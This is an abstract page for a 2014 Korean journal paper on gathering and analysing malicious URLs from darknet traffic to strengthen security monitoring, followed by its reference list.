Browse > Article
http://dx.doi.org/10.13089/JKIISC.2014.24.6.1185

A Study on Collection and Analysis Method of Malicious URLs Based on Darknet Traffic for Advanced Security Monitoring and Response  

Kim, Kyu-Il (Korea Institute of Science and Technology Information)
Choi, Sang-So (Korea Institute of Science and Technology Information)
Park, Hark-Soo (Korea Institute of Science and Technology Information)
Ko, Sang-Jun (Korea Institute of Science and Technology Information)
Song, Jung-Suk (Korea Institute of Science and Technology Information)
Publication Information
Journal of the Korea Institute of Information Security & Cryptology / v.24, no.6, 2014 , pp. 1185-1195 More about this Journal
Abstract
Domestic and international CERTs are carrying out security monitoring and response services based on security devices for intrusion incident prevention and damage minimization of the organizations. However, the security monitoring and response service has a fatal limitation in that it is unable to detect unknown attacks that are not matched to the predefined signatures. In recent, many approaches have adopted the darknet technique in order to overcome the limitation. Since the darknet means a set of unused IP addresses, no real systems connected to the darknet. Thus, all the incoming traffic to the darknet can be regarded as attack activities. In this paper, we present a collection and analysis method of malicious URLs based on darkent traffic for advanced security monitoring and response service. The proposed method prepared 8,192 darknet space and extracted all of URLs from the darknet traffic, and carried out in-depth analysis for the extracted URLs. The analysis results can contribute to the emergence response of large-scale cyber threats and it is able to improve the performance of the security monitoring and response if we apply the malicious URLs into the security devices, DNS sinkhole service, etc.
Keywords
Darknet; Security Monitoring and Response; Malicious URLs;
Citations & Related Records
Times Cited By KSCI : 1  (Citation Analysis)
연도 인용수 순위
1 Eto, M., Inoue. D., Song, J., Nakazato, J., Ohtaka, K., and Nakao, K., "nicter : A Large-Scale Network Incident Analysis System," Proc. of the First Workshop on Building Analysis Datasets and Gathering Experience Returns for Security(BADGERS '11), pp. 37-45, Apr. 2011.
2 Kim, H., Choi, S., and Song, J., "A Methodology for Multipurpose DNS Sinkhole Analyzing Double Bounce Emails," Proc. on ICONIP 2013, LNCS 8226, pp. 609-616, Nov. 2013.
3 Spitzner, L., "The Honeynet Project: trapping the hackers," Magazine of Security & Privacy, IEEE pp.15-23, Mar. 2003.
4 Choi, S., Kim, S., and Park, H., "A Fusion Framework of IDS Alerts and Darknet Traffic for Effective Incident Monitoring and Response," Journal of Applied Mathematics & Information Science, pp.245-251, Dec. 2013.
5 Egele, M., Scholte, T., Kirda, E., and Kruegel, C., "A survey on automated dynamic malware-analysis techniques and tools," Journal of ACM Computing Surveys (CSUR) Vol. 44, Issue 2, Feb. 2012.
6 Lee, H., Choi, S., Lee, Y., and Park, H., "Enhanced Sinkhole System by Improving Post-processing Mechanism," Proc. on FGIT 2010, LNCS 6485, pp. 469-480, Dec. 2010.
7 Abbasi, F., H, and Harris, R. J., "Experiences with a Generation III virtual Honeynet," Proc. of the Telecommunication Networks and Applications Conference(ATNAC'09), pp.1-6, Nov. 2009.
8 Abbasi, F., H, and Harris, R. J., "Intrusion detection in Honeynets by compression and hashing," Proc. of the Telecommunication Networks and Application Conference (ATNAC'10), pp.96-101, Nov. 2010.
9 Bailey, M., Cooke, E., Jahanian, F., Provos, N., Rosaen, K., and Watson, D., "Data Reduction for the Scalable Automated Analysis of Distributed Darknet Traffic," Proc. of the 5th ACM SIGCOMM conference on Internet Measurement(IMC'05), pp 239-252, Oct. 2005.
10 Willenms, C., Holz, T., and Freiling, F., "Toward Automated Dynamic Malware Analysis Using CW Sandbox," Journal of IEEE Security and Privacy, Vol 5, Issue 2, Mar. 2007.
11 Qiu, H., and Osoro F. C. C., "Static malware detection with Segmented Sandboxing," Proc. of 8th International Conference on the Malicious and Unwanted Software (MALWARE'13), pp. 132-141, Oct. 2013.
12 Nakao, K., Inoue, D., Eto, M., and Yoshioka, K., "Practical Correlation Analysis Between Scan and Malware Proles Against Zero-day Attacks Based on Darknet Monitoring," Journal of IEICE Transactions on Information and System E 92D(5), pp.787-798, Dec. 2009.
13 Kim, Y., and Youm, H., "A New Bot Disinfection Method Based on DNS Sinkhole," Journal of the Korea Institute of Information Security & Cryptology vol.18, no.6, pp. 107-114, Dec. 2008.   과학기술학회마을
14 Harrop, W., Armitage, G., "Gerynets: a definition and evaluation of sparsely populated darknets," Proc. of the ACM SIGCOMM workshop on Mining network data(MineNet'05), pp. 171-172, Aug. 2005.
15 Harrop, W., Armitage, G., "Defining and Evaluating Greynets(Sparse Darknets)," Proc. of the IEEE conference on Local Computer Networks 30th Anniversary(LCN'05), pp. 344-350, Nov. 2005.